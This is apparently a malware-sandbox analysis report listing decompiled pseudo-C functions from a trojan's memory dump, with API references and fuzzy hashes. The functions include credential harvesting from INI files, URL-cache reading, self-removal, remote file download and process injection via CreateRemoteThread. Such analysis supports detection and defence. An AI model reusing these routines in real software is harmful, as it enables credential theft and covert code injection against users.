    					if(_t59 != 0) {
    						 *_t59 =  *_t59 & 0x00000000;
    						__eflags =  *_t59;
    					}
    					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
    					if(__eflags != 0) {
    						L22:
    						_t60 =  *((intOrPtr*)(_t96 + 0x18));
    						__eflags = _t60 - 0xffffffff;
    						if(_t60 != 0xffffffff) {
    							__eflags = _v16 - 0xffffffff;
    							if(_v16 == 0xffffffff) {
    								_t61 = _t60 -  *(_t96 + 0x1c);
    								__eflags = _t61;
    								_t103 = _t61;
    								if(_t61 != 0) {
    									__eflags = _a8;
    									if(_a8 == 0) {
    										_a12 = E00413083(0x2000, 0x1000);
    									}
    									__eflags = _a12 - _t103;
    									_t103 =  <  ? _a12 : _t103;
    									__eflags = _a8;
    									if(_a8 != 0) {
    										E00411D3A(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
    										_t50 = _t96 + 0x1c;
    										 *_t50 =  *(_t96 + 0x1c) + _t103;
    										__eflags =  *_t50;
    									}
    								}
    								_t62 = _a16;
    								__eflags = _t62;
    								if(_t62 != 0) {
    									 *_t62 = _t103;
    								}
    								_v16 = 1;
    							}
    						}
    						goto L32;
    					}
    					LeaveCriticalSection(0x422aa4);
    					_v5 = E0040E544( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
    					EnterCriticalSection(0x422aa4);
    					__eflags = _v5;
    					if(_v5 == 0) {
    						L21:
    						_t37 =  &_v16;
    						 *_t37 = _v16 & 0x00000000;
    						__eflags =  *_t37;
    						SetLastError(0x2ee4);
    						goto L22;
    					}
    					_t105 =  *_a4;
    					_t71 = E0040DEC2( *_a4);
    					__eflags = _t71 - 0xffffffff;
    					if(_t71 == 0xffffffff) {
    						E00411CFE(_v12);
    						goto L21;
    					}
    					_t96 = _t71 * 0x24 +  *0x422abc;
    					_t101 = E00413E34( &_v24, _t105);
    					_t79 = E0041BA1E( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
    					__eflags = _t79;
    					if(_t79 == 0) {
    						L19:
    						E00411CFE(_t101);
    						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
    						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
    						goto L22;
    					}
    					_t84 = E00411F3E(_v24, 0, _t101);
    					_a4 = _t84;
    					__eflags = _t84;
    					if(_t84 == 0) {
    						goto L19;
    					}
    					_v28 = 0x1000;
    					_t107 = E00411CCE(0x1000);
    					__eflags = _t107;
    					if(_t107 == 0) {
    						L18:
    						E00411CFE(_a4);
    						goto L19;
    					}
    					 *_t107 = 0x50;
    					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
    					__eflags = _t89;
    					if(_t89 != 0) {
    						_t91 =  *(_t107 + 8);
    						__eflags = _t91;
    						if(_t91 != 0) {
    							__eflags =  *_t91;
    							if( *_t91 != 0) {
    								E00416EB9(_t91, _v12, _v20);
    							}
    						}
    					}
    					E00411CFE(_t107);
    					goto L18;
    				} else {
    					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
    					L32:
    					goto L33;
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00422AA4), ref: 0040E66E
    • LeaveCriticalSection.KERNEL32(00422AA4), ref: 0040E6D1
    • EnterCriticalSection.KERNEL32(00422AA4), ref: 0040E6EE
    • GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0040E772
    • SetLastError.KERNEL32(00002EE4), ref: 0040E7C8
    • LeaveCriticalSection.KERNEL32(00422AA4), ref: 0040E831
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
    • String ID:
    • API String ID: 3653105453-0
    • Opcode ID: 457f56e62f8edac2a39dede2ab6e20b98cc474391faafba1c6d035a264bd2a22
    • Instruction ID: c4b01e0a972c91f95f33b46e61665e809106921f95c238847ac81fabb73dabc9
    • Opcode Fuzzy Hash: 457f56e62f8edac2a39dede2ab6e20b98cc474391faafba1c6d035a264bd2a22
    • Instruction Fuzzy Hash: 04519231A00215AFCF14EF66C984B9E7BB4AF04314F14496AF910BB2E1D778D991CF98
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0040941C(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
    				WCHAR* _v8;
    				WCHAR* _v12;
    				short* _v16;
    				WCHAR* _v20;
    				short _v32;
    				short _v48;
    				short _v68;
    				short _v88;
    				short _v112;
    				char _v144;
    				void* __edi;
    				void* __esi;
    				WCHAR* _t40;
    				long _t41;
    				void* _t48;
    				void* _t50;
    				void* _t52;
    				void* _t54;
    				void* _t56;
    				WCHAR* _t61;
    				WCHAR* _t64;
    				void* _t72;
    				void* _t76;
    				WCHAR* _t83;
    				WCHAR* _t84;
    				WCHAR* _t86;
    				intOrPtr _t96;
    				void* _t97;
    
    				_t81 = __edx;
    				_t40 = E00411CCE(0x1fffe);
    				_t86 = _t40;
    				_v20 = _t86;
    				if(_t86 == 0) {
    					return _t40;
    				}
    				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
    				if(_t41 <= 0) {
    					L17:
    					return E00411CFE(_t86);
    				}
    				_t3 = _t41 + 1; // 0x1
    				if(E00412BAE(_t86, _t3) == 0) {
    					goto L17;
    				}
    				_t83 = E00411CCE(0xc08);
    				_v12 = _t83;
    				if(_t83 == 0) {
    					goto L17;
    				} else {
    					_t5 =  &(_t83[0x2fd]); // 0x5fa
    					_v16 = _t5;
    					_v8 = _t86;
    					_t48 = 0x65;
    					E00419897(_t48,  &_v112);
    					_t50 = 0x66;
    					E00419897(_t50,  &_v48);
    					_t52 = 0x67;
    					E00419897(_t52,  &_v32);
    					_t54 = 0x68;
    					E00419897(_t54,  &_v88);
    					_t56 = 0x69;
    					E00419897(_t56,  &_v68);
    					goto L6;
    					L15:
    					_t61 = E00412BEA(_v8, 1);
    					_v8 = _t61;
    					if(_t61 != 0) {
    						_t83 = _v12;
    						L6:
    						if(StrStrIW(_v8,  &_v112) == 0) {
    							_t64 = StrStrIW(_v8,  &_v48);
    							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
    								_t84 =  &(_t83[0xff]);
    								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
    									_t26 =  &(_t84[0xff]); // 0x0
    									_t94 = _t26;
    									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E004092B1(_t81, _t94) > 0) {
    										_t95 =  &_v144;
    										_t72 = 0x56;
    										E00419897(_t72,  &_v144);
    										_push(_v12);
    										_t30 =  &(_t84[0xff]); // 0x0
    										_push(_t84);
    										_t85 = _v16;
    										_t81 = 0x307;
    										_t76 = E004129F1(_t95, 0x307, _v16, _t95);
    										_t97 = _t97 + 0x10;
    										if(_t76 > 0) {
    											_t96 = _a8;
    											if(E004120F2(_t76, _t96, _t85) != 0) {
    												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L15;
    					} else {
    						E00411CFE(_v12);
    						_t86 = _v20;
    						goto L17;
    					}
    				}
    			}

    APIs
    • GetPrivateProfileStringW.KERNEL32 ref: 00409453
      • Part of subcall function 00411CCE: HeapAlloc.KERNEL32(00000008,-00000004,0041349C,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411CDF
    • StrStrIW.SHLWAPI(?,?), ref: 004094DB
    • StrStrIW.SHLWAPI(?,?), ref: 004094EC
    • GetPrivateProfileStringW.KERNEL32 ref: 00409508
    • GetPrivateProfileStringW.KERNEL32 ref: 00409526
    • GetPrivateProfileStringW.KERNEL32 ref: 00409540
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: PrivateProfileString$AllocHeap
    • String ID:
    • API String ID: 2479592106-0
    • Opcode ID: d00f48f604f5c4d983bbb0f6b0d6e04d99afc620cf1eb3f03d9dbc97e8f6a27f
    • Instruction ID: 1f5b467a5f6615199a12082db497050d7a223a643b96cb4042084586d6ea43e6
    • Opcode Fuzzy Hash: d00f48f604f5c4d983bbb0f6b0d6e04d99afc620cf1eb3f03d9dbc97e8f6a27f
    • Instruction Fuzzy Hash: 59419232900216FADF11ABA6CD01EEFBB79EF44704F10446AF915F7292D7389E418BA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 76%
    			E004115E4(void* __ebx, void* __ecx, void* __eflags) {
    				char _v1168;
    				char _v1668;
    				char _v1680;
    				short _v1688;
    				char _v2192;
    				short _v2208;
    				char _v2720;
    				char _v2728;
    				char _v2992;
    				char _v3072;
    				void* __edi;
    				void* __esi;
    				void* _t34;
    				WCHAR* _t50;
    				WCHAR* _t51;
    				WCHAR* _t52;
    				void* _t56;
    				void* _t65;
    
    				_t65 = __eflags;
    				_t46 = __ecx;
    				_push(_t56);
    				_t50 =  &_v1668;
    				E0041CD51(__ecx, _t50, _t56, 1);
    				PathRemoveFileSpecW(_t50);
    				_t51 =  &_v2192;
    				E0041CD51(_t46, _t51, PathRemoveFileSpecW, 2);
    				PathRemoveFileSpecW(_t51);
    				 *0x423b60 =  *0x423b60 | 0x00000002;
    				_push(0);
    				E00410B72();
    				E00419B85(_t46, _t65);
    				E0041737C( &_v1680, _t65);
    				E0041737C(_t51, _t65);
    				_t52 =  &_v2720;
    				E0041CD51(_t51, _t52, PathRemoveFileSpecW, 3);
    				SHDeleteKeyW(0x80000001, _t52);
    				CharToOemW( &_v1688,  &_v2728);
    				CharToOemW( &_v2208,  &_v2992);
    				_t53 =  &_v3072;
    				_t34 = 7;
    				E00419861(_t34,  &_v3072);
    				_push( &_v2992);
    				_push( &_v2728);
    				_push( &_v2992);
    				_push( &_v2728);
    				if(E00412A35( &_v3072, 0x474,  &_v1168, _t53) > 0) {
    					E004137BE(__ebx, 0x474,  &_v1168);
    				}
    				if( *0x424028 == 0xffffffff) {
    					ExitProcess(0);
    				}
    				return 1;
    			}

    APIs
      • Part of subcall function 0041CD51: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423BC0,00000032,00020016,?,00000000), ref: 0041CDCC
    • PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00411609
    • PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0041161C
      • Part of subcall function 00410B72: SetEvent.KERNEL32(0041162C,00000000), ref: 00410B78
      • Part of subcall function 00410B72: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410B8B
      • Part of subcall function 00419B85: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,00020EB6), ref: 00419BC2
      • Part of subcall function 00419B85: Sleep.KERNEL32(000001F4), ref: 00419BD1
      • Part of subcall function 00419B85: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 00419BE7
      • Part of subcall function 0041737C: FindFirstFileW.KERNEL32(?,?,?,?), ref: 004173AD
      • Part of subcall function 0041737C: FindNextFileW.KERNEL32(00000000,?), ref: 00417408
      • Part of subcall function 0041737C: FindClose.KERNEL32(00000000), ref: 00417413
      • Part of subcall function 0041737C: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 0041741F
      • Part of subcall function 0041737C: RemoveDirectoryW.KERNEL32(?), ref: 00417426
    • SHDeleteKeyW.SHLWAPI(?,?,00000003,00000000), ref: 0041165A
    • CharToOemW.USER32 ref: 00411676
    • CharToOemW.USER32 ref: 00411685
    • ExitProcess.KERNEL32 ref: 004116DB
      • Part of subcall function 004137BE: CharToOemW.USER32 ref: 004137EE
      • Part of subcall function 004137BE: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00413872
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
    • String ID:
    • API String ID: 1572960351-0
    • Opcode ID: 3472b72341687278d4a35ba34a83e05e0bad088948d6607f19883c889ed9233f
    • Instruction ID: d86a50a7599f90da202955a2e631175a7a43dc0372ed09d6c381f42b16f9d49b
    • Opcode Fuzzy Hash: 3472b72341687278d4a35ba34a83e05e0bad088948d6607f19883c889ed9233f
    • Instruction Fuzzy Hash: D121A4729083449BC230EBA6DC4AFDB7BACEB84354F00092BB55CD71A1DB74A545CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00413B40(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
    				char _v5;
    				long _v12;
    				struct _OVERLAPPED* _v16;
    				void* _v20;
    				long _v24;
    				void* _t28;
    				long _t37;
    				void* _t41;
    
    				_v5 = 0;
    				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
    				if(_t41 == 0xffffffff) {
    					L15:
    					return _v5;
    				}
    				_t28 = E00411CCE(0x1000);
    				_v20 = _t28;
    				if(_t28 == 0) {
    					L13:
    					CloseHandle(_t41);
    					if(_v5 == 0) {
    						E00417064(_a8);
    					}
    					goto L15;
    				}
    				_v16 = 0;
    				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
    					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
    						break;
    					}
    					if(_v12 == 0) {
    						FlushFileBuffers(_t41);
    						_v5 = 1;
    						break;
    					}
    					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
    						break;
    					}
    					_t37 = _v12;
    					if(_t37 != _v24) {
    						break;
    					}
    					_v16 = _v16 + _t37;
    					if(_v16 <= _a12) {
    						continue;
    					}
    					break;
    				}
    				E00411CFE(_v20);
    				goto L13;
    			}

    APIs
    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00413B60
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00413B8E
    • InternetReadFile.WININET(00001000,?,00001000,?), ref: 00413BAA
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00413BC5
    • FlushFileBuffers.KERNEL32(00000000), ref: 00413BE5
    • CloseHandle.KERNEL32(00000000), ref: 00413BF8
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
    • String ID:
    • API String ID: 3509176705-0
    • Opcode ID: a17a9cdbe3e7b7b013d15a1331bcea809d1baf8f0a001b0e9977f4eb98896287
    • Instruction ID: 762323041f3b511488a650bc342d812b349e5f63327be035d82a57b595241685
    • Opcode Fuzzy Hash: a17a9cdbe3e7b7b013d15a1331bcea809d1baf8f0a001b0e9977f4eb98896287
    • Instruction Fuzzy Hash: C821AF31A08249BFDF119FA4CC84FEE7BB9AB04346F00447AF511B5261E7399E859B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0041643E(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
    				intOrPtr* _v8;
    				long _v12;
    				struct HWND__* _v16;
    				int _v20;
    				struct HWND__* _v24;
    				long _t24;
    				struct HWND__* _t33;
    				intOrPtr* _t44;
    
    				_push(_a8);
    				_t44 = __edx;
    				_v8 = __edx;
    				_v20 = __ecx;
    				_t33 = WindowFromPoint(_a4.x);
    				if(_t33 != 0) {
    					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
    						_t24 = _v12;
    						if(_t24 != 0xffffffff) {
    							if(_t44 != 0) {
    								 *_t44 = _t24;
    							}
    						} else {
    							_v16 = _t33;
    							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
    							_t33 = E0041643E(_v20, _v8, _a4, _a8);
    							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
    						}
    					} else {
    						_t33 = 0;
    					}
    				}
    				return _t33;
    			}

    APIs
    • WindowFromPoint.USER32(?,?), ref: 0041645A
    • SendMessageTimeoutW.USER32 ref: 0041648B
    • GetWindowLongW.USER32(00000000,000000F0), ref: 004164AF
    • SetWindowLongW.USER32 ref: 004164C0
    • GetWindowLongW.USER32(?,000000F0), ref: 004164DD
    • SetWindowLongW.USER32 ref: 004164EB
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: Window$Long$FromMessagePointSendTimeout
    • String ID:
    • API String ID: 2645164282-0
    • Opcode ID: 655531a235bd0dbbf39ddf06de3dee46542ef769496b83b6bf62ed187e13ec78
    • Instruction ID: eddfeb4c5a8e0d1f34b1a532a8465685b4c30a7f3da5e6ff95818b41fc791df3
    • Opcode Fuzzy Hash: 655531a235bd0dbbf39ddf06de3dee46542ef769496b83b6bf62ed187e13ec78
    • Instruction Fuzzy Hash: 7421D571508316ABD7109F28CC40EAB7B98EB94330F20472EBDB0922E1DA74E844DBD9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0041643E(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
    				intOrPtr* _v8;
    				long _v12;
    				struct HWND__* _v16;
    				int _v20;
    				struct HWND__* _v24;
    				long _t24;
    				struct HWND__* _t33;
    				intOrPtr* _t44;
    
    				_push(_a8);
    				_t44 = __edx;
    				_v8 = __edx;
    				_v20 = __ecx;
    				_t33 = WindowFromPoint(_a4.x);
    				if(_t33 != 0) {
    					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
    						_t24 = _v12;
    						if(_t24 != 0xffffffff) {
    							if(_t44 != 0) {
    								 *_t44 = _t24;
    							}
    						} else {
    							_v16 = _t33;
    							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
    							_t33 = E0041643E(_v20, _v8, _a4, _a8);
    							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
    						}
    					} else {
    						_t33 = 0;
    					}
    				}
    				return _t33;
    			}

    APIs
    • WindowFromPoint.USER32(?,?), ref: 0041645A
    • SendMessageTimeoutW.USER32 ref: 0041648B
    • GetWindowLongW.USER32(00000000,000000F0), ref: 004164AF
    • SetWindowLongW.USER32 ref: 004164C0
    • GetWindowLongW.USER32(?,000000F0), ref: 004164DD
    • SetWindowLongW.USER32 ref: 004164EB
    Memory Dump Source
    • Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File
    Similarity
    • API ID: Window$Long$FromMessagePointSendTimeout
    • String ID:
    • API String ID: 2645164282-0
    • Opcode ID: 655531a235bd0dbbf39ddf06de3dee46542ef769496b83b6bf62ed187e13ec78
    • Instruction ID: eddfeb4c5a8e0d1f34b1a532a8465685b4c30a7f3da5e6ff95818b41fc791df3
    • Opcode Fuzzy Hash: 655531a235bd0dbbf39ddf06de3dee46542ef769496b83b6bf62ed187e13ec78
    • Instruction Fuzzy Hash: 7421D571508316ABD7109F28CC40EAB7B98EB94330F20472EBDB0922E1DA74E844DBD9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E00416F1E(signed int __eax, void* __ecx, void** __esi, long _a4) {
    				intOrPtr _v8;
    				long _v12;
    				void* _t19;
    				void* _t20;
    				long _t22;
    				void* _t23;
    
    				_t33 = __esi;
    				asm("sbb eax, eax");
    				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
    				__esi[2] = _t19;
    				if(_t19 == 0xffffffff) {
    					L11:
    					_t20 = 0;
    				} else {
    					__imp__GetFileSizeEx(_t19,  &_v12);
    					if(_t19 == 0 || _v8 != 0) {
    						L10:
    						CloseHandle(_t33[2]);
    						goto L11;
    					} else {
    						_t22 = _v12;
    						__esi[1] = _t22;
    						if(_t22 != 0) {
    							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
    							 *__esi = _t23;
    							if(_t23 == 0) {
    								goto L10;
    							} else {
    								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
    									VirtualFree( *_t33, 0, 0x8000);
    									goto L10;
    								} else {
    									goto L5;
    								}
    							}
    						} else {
    							 *__esi = 0;
    							L5:
    							_t20 = 1;
    						}
    					}
    				}
    				return _t20;
    			}

    APIs
    • CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F43
    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F56
    • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F7E
    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F96
    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,0041D23F,?,?,00000000), ref: 00416FB0
    • CloseHandle.KERNEL32(?,?,?,?,?,0041D23F,?,?,00000000), ref: 00416FB9
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
    • String ID:
    • API String ID: 1974014688-0
    • Opcode ID: fca3f4c0c788685756dda70a8404c1b1278f418756d445aa081f114cca3b8bea
    • Instruction ID: 2642e8169926d688b4e3f124a82999e8e06a5e3b16fcc6d231804f51d0490611
    • Opcode Fuzzy Hash: fca3f4c0c788685756dda70a8404c1b1278f418756d445aa081f114cca3b8bea
    • Instruction Fuzzy Hash: AF119071100200BFDB218F60DD49EABBBFCEB55750B11492DF596E61A0D671E981CB28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E00406CC6(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
    				void* _t21;
    				int _t22;
    				signed int _t23;
    				struct HWND__* _t27;
    				char* _t31;
    
    				_t27 = _a4;
    				if(( *0x423b60 & 0x00000004) == 0 || E0041CB59() == 0) {
    					L7:
    					return GetUpdateRgn(_t27, _a8, _a12);
    				} else {
    					_t31 = TlsGetValue( *0x42291c);
    					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
    						goto L7;
    					} else {
    						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
    						if(_a12 != 0) {
    							_t22 = SaveDC( *(_t31 + 8));
    							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
    							asm("sbb eax, eax");
    							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
    							RestoreDC( *(_t31 + 8), _t22);
    						}
    						 *_t31 = 1;
    						_t21 = 2;
    						return _t21;
    					}
    				}
    			}

    APIs
    • GetUpdateRgn.USER32 ref: 00406D4E
      • Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61
    • TlsGetValue.KERNEL32 ref: 00406CE6
    • SetRectRgn.GDI32(?,?,?,?,?), ref: 00406D06
    • SaveDC.GDI32(?), ref: 00406D16
    • SendMessageW.USER32(?,00000014,?,00000000), ref: 00406D26
    • RestoreDC.GDI32(?,00000000), ref: 00406D38
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
    • String ID:
    • API String ID: 3142230470-0
    • Opcode ID: 9b30061394e02e57e1e2c22dcc98c23f53723d069bf01480b09e76bcd1708ed2
    • Instruction ID: abf1c81bcc1d5d0e7c9ccec9e24aeaa2e6e20d46a88e9193ff7121f589ff7e51
    • Opcode Fuzzy Hash: 9b30061394e02e57e1e2c22dcc98c23f53723d069bf01480b09e76bcd1708ed2
    • Instruction Fuzzy Hash: 0A11AC71100344AFCB325F61ED48FA67BA5FF08310F044929FA82A65B1C335A8A1DB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E004063F6(void* __ecx, long _a4, intOrPtr _a8) {
    				char _v5;
    				void* __edi;
    				void* __esi;
    				void* _t10;
    				void* _t14;
    				void* _t23;
    				void* _t25;
    				void* _t26;
    
    				_t21 = __ecx;
    				_push(__ecx);
    				_v5 = 0;
    				_t23 = OpenProcess(0x47a, 0, _a4);
    				_t28 = _t23;
    				if(_t23 != 0) {
    					_push(_t25);
    					_t10 = E0041CA6E(_t21, _t23, _t25, _t28, _a8, 0);
    					_t26 = _t10;
    					if(_t26 != 0) {
    						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x423b74 + E0041D212, 0, 0, 0);
    						_a4 = _t14;
    						if(_t14 == 0) {
    							VirtualFreeEx(_t23, _t26, 0, 0x8000);
    						} else {
    							WaitForSingleObject(_t14, 0x2710);
    							CloseHandle(_a4);
    							_v5 = 1;
    						}
    					}
    					CloseHandle(_t23);
    				}
    				return _v5;
    			}

    APIs
    • OpenProcess.KERNEL32(0000047A,00000000,0001FDA6,00000000,0001FDA6,?,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 0040640A
    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-00840D86,00000000,00000000,00000000), ref: 00406438
    • WaitForSingleObject.KERNEL32(00000000,00002710,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 0040644B
    • CloseHandle.KERNEL32(0001FDA6,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 00406454
    • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 00406468
    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,004065AE,?,?,00000000,?,0001FDA6,00000000), ref: 0040646F
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File
    Similarity
    • API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
    • String ID:
    • API String ID: 14861764-0
    • Opcode ID: 7cd496954eed62964d7ef9b6a3e10d36b7efcb5286d6ba78d7a6a9e12dff4105
    • Instruction ID: ff0c7bc01d04e5d39be5f9001d6b7d2717d17b2d1483ab124f0dc3f8ad5f9b48
    • Opcode Fuzzy Hash: 7cd496954eed62964d7ef9b6a3e10d36b7efcb5286d6ba78d7a6a9e12dff4105
    • Instruction Fuzzy Hash: F801B1B2104248BFEB112F749DCCEBF3E6CDB49794B008179F902F2160C6398C559A39
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E0041D772(void* _a4, WCHAR* _a8) {
    				char _v40;
    				char _v160;
    				char _v680;
    				void* __edi;
    				void* __esi;
    				void** _t11;
    				void* _t13;
    				void* _t16;
    				void* _t18;
    				void* _t23;
    				void* _t28;
    				void* _t30;
    				WCHAR* _t34;
    
    				_t11 =  &_a4;
    				_t28 = 0;
    				__imp__ConvertSidToStringSidW(_a4, _t11);
    				if(_t11 != 0) {
    					_t37 =  &_v160;
    					_t13 = 4;
    					E00419897(_t13,  &_v160);
    					_push(_a4);
    					_t34 =  &_v680;
    					_t16 = E004129F1(_t37, 0x104, _t34, _t37);
    					_pop(_t30);
    					if(_t16 > 0) {
    						_t18 = 5;
    						E00419897(_t18,  &_v40);
    						_t23 = E00415E26(0x80000002, _t30, _t34, _t34,  &_v40, 0x104);
    						if(_t23 != 0 && _t23 != 0xffffffff) {
    							PathUnquoteSpacesW(_t34);
    							ExpandEnvironmentStringsW(_t34, _a8, 0x104);
    							asm("sbb bl, bl");
    							_t28 = 1;
    						}
    					}
    					LocalFree(_a4);
    				}
    				return _t28;
    			}

    APIs
    • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 0041D785
    • LocalFree.KERNEL32(?,.exe,00000000), ref: 0041D80D
      • Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B
